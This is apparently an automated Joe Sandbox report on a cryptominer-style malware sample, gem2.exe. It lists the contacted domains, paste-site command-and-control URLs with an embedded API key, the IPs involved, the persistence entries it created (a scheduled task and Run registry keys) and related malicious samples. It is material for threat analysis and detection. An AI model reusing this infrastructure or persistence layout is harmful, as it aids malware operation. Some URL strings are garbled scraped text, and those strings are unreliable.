                  https://securetextweb.cc/BAT;.CMMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://coolcarforum.com/IxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://flixmi.top/xxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.openssl.org/svchost.exefalse
                    		high
                    https://deepseahunter.com.de/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://deepseahunter.com.de/5Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://SuccessFromWithin.ru/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://LearnToCodeWithUs.su/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.se/docs/hsts.htmlsvchost.exe, svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpfalse
                      		high
                      https://creativecoder.top/sMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://curl.se/docs/alt-svc.html#svchost.exefalse
                        		high
                        https://RusTechHub.ru/ath=C:Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://curl.se/svchost.exefalse
                          		high
                          https://brettdogecoin.com/tMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://spokoystvieidusha.ru/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://indexinferno.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://curl.se/docs/hsts.html#svchost.exefalse
                            		high
                            https://creativecoder.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://spokoystvieidusha.ru/E;.WSMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 0000001F.00000002.1554825743.000002006B931000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://projectretrac.com/P_PROFMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://wavepassage.cfd/BkzMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txtsvchost.exe, 00000010.00000002.2555613530.00000173CFB71000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpusvchost.exe, 00000010.00000002.2554341140.00000173CE0BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553736925.00000173CE000000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://textbinvault.com/svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://pastesnap.com/(Wpowercfg.exe, 00000012.00000002.1449981083.0000029437030000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://wavepassage.cfd/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://brettdogecoin.com/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001F.00000002.1514433357.000002005B8C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://pastesnap.com/API/cGFzdGVzbmFwEP.phpPKU2Usvchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://pastesnap.com/API/cGFzdGVzbmFwEP.phpapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpusvchost.exe, 00000010.00000002.2554569786.00000173CE0EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2555613530.00000173CFB6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://SuccessFromWithin.ru/HkpMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://adorebeautyz.top/SSOR_ARMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://burningspice.cfd/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ipinfo.io/countryNVIDIAAMDntdll.dllRtlGetVersionWindowssvchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  https://pastesnap.com/STB/cGFzdGVzbmFwM.txt/gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://api.ipify.orgwmicsvchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001F.00000002.1514433357.000002005BAED000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://pastesnap.com/STB/cGFzdGVzbmFwM.txt5gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001F.00000002.1514433357.000002005BAED000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://go.micropowershell.exe, 0000001F.00000002.1514433357.000002005CA10000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://LearnToCodeWithUs.su/nMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://syncaicloud.com/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://tiffanyonlinestore.top/aMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 0000001F.00000002.1554825743.000002006B931000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://TechVenturesFromRussia.su/GMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://tiffanyonlinestore.top/HWinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://FeelGoodForever.org.ru/FxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://curl.se/docs/alt-svc.htmlsvchost.exe, svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://adorebeautyz.top/hMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://pastesnap.com/API/cGFzdGVzbmFwEP.phpYg==M.txtsage.cfdapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settsvchost.exe, 00000010.00000002.2554482364.00000173CE0D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 0000001F.00000002.1514433357.000002005BAED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://LearnToCodeWithUs.su/PDATAMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://namesell.sbs/tMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txtsvchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://RussianTechInnovationHub.ru/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://pastesnap.com/API/cGFzdGVzbmFwEP.phpsvchost.exe, 00000010.00000002.2554341140.00000173CE0C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://leadingworld.top/PE=C;LCCWinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu4csvchost.exe, 00000010.00000002.2554097147.00000173CE06D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2554341140.00000173CE0BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://api.ipify.orgC:curl.exe, 0000003C.00000002.1548361165.0000023245FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://burningspice.cfd/mMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://curl.se/docs/copyright.htmlsvchost.exefalse
                                                    		high
                                                    http://www.zlib.net/Dsvchost.exe, 00000010.00000002.2554873475.00000173CF9C7000.00000002.10000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60svchost.exe, 00000010.00000002.2554569786.00000173CE0EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2555613530.00000173CFB6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2554482364.00000173CE0D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bluebullet.su/gMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://pastesnap.com/0xYWMIC.exe, 00000037.00000002.1519599624.000001C183517000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1519154244.000001C183517000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1516325556.000001C183512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://creativecoder.top/=Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://jobscontext.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://securetextweb.cc/svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, Microsoft-f4855f59e0.exe, 00000011.00000003.1446815949.0000017D99E3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000000.1444761623.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475795269.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000000.1472403011.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525296362.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000000.1536925194.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://lunarminer.network/svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuebsvchost.exe, 00000010.00000002.2553736925.00000173CE000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://FeelGoodForever.org.ru/NkNMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://RusTechHub.ru/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://gamergategames.top/uxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://RusTechHub.ru/0WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://curl.se/Vsvchost.exe, 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://leadingworld.top/System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmp, System-f4855f59e0.exe, 0000000E.00000000.1334218488.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp, System-f4855f59e0.exe, 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp, Microsoft-f4855f59e0.exe, Microsoft-f4855f59e0.exe, 00000011.00000003.1446815949.0000017D99E3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000000.1444761623.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475795269.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000000.1472403011.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525296362.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000000.1536925194.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://syncaicloud.com/ndowsMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60https://pastesnap.com/API/cGFzdGVzbmFsvchost.exe, 00000010.00000002.2554482364.00000173CE0D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://pastesnap.com/KhSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD5989C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          172.67.176.186
                                                          		textbinvault.comUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          104.21.60.172
                                                          		unknownUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          104.26.12.205
                                                          		api.ipify.orgUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          188.114.97.3
                                                          		wavepassage.cfdEuropean Union
                                                          		13335CLOUDFLARENETUSfalse
                                                          142.250.181.228
                                                          		www.google.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          172.67.198.113
                                                          		pastesnap.comUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          104.21.64.1
                                                          		securetextweb.ccUnited States
                                                          		13335CLOUDFLARENETUSfalse

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1589411
                                                          Start date and time:2025-01-12 09:25:16 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 10m 23s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:59
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:5
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:gem2.exe
                                                          Detection:MAL
                                                          Classification:mal100.evad.mine.winEXE@73/18@7/8
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 75
                                                          • Number of non-executed functions: 272
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 40.126.32.140, 40.126.32.76, 20.190.160.17, 40.126.32.74, 20.190.160.22, 40.126.32.136, 20.190.160.14, 40.126.32.68, 13.107.246.45, 20.109.210.53
                                                          • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, ipinfo.io, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                          • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          03:26:14API Interceptor32x Sleep call for process: powershell.exe modified
                                                          05:14:48API Interceptor2x Sleep call for process: WMIC.exe modified
                                                          05:15:24API Interceptor183383x Sleep call for process: lsass.exe modified
                                                          05:15:24API Interceptor235257x Sleep call for process: winlogon.exe modified
                                                          05:15:26API Interceptor442x Sleep call for process: svchost.exe modified
                                                          05:15:30API Interceptor200223x Sleep call for process: dwm.exe modified
                                                          05:15:33API Interceptor52x Sleep call for process: WmiPrvSE.exe modified
                                                          05:15:38API Interceptor286x Sleep call for process: dllhost.exe modified
                                                          09:26:20Task SchedulerRun new task: System-f4855f59e0 path: C:\Windows\System32\System-f4855f59e0.exe
                                                          09:26:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft-f4855f59e0 C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
                                                          09:26:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft-f4855f59e0 C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          172.67.176.186INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                          • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                          104.21.60.172http://meta.fanpage-suite-help.live/Get hashmaliciousHTMLPhisherBrowse
                                                            https://documentsafedonline365.cloudGet hashmaliciousUnknownBrowse
                                                              104.26.12.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                              • api.ipify.org/
                                                              jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/?format=text
                                                              xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                              • api.ipify.org/
                                                              GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                              • api.ipify.org/
                                                              8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                              • api.ipify.org/
                                                              Simple2.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                              • api.ipify.org/
                                                              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                              • api.ipify.org/
                                                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                              • api.ipify.org/
                                                              188.114.97.3qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                              • www.zkdamdjj.shop/kf1m/
                                                              8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                              • www.rtpwslot888gol.sbs/jmkz/
                                                              1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                              • www.rgenerousrs.store/o362/
                                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                              • www.zkdamdjj.shop/swhs/
                                                              k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                              • www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF
                                                              wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                              • www.supernutra01.online/rk61/
                                                              NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                              • www.vh5g.sbs/rjsl/
                                                              KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                              • www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
                                                              GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                              • /api/get/dll
                                                              DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                              • www.uzshou.world/ricr/

                                                              Domains

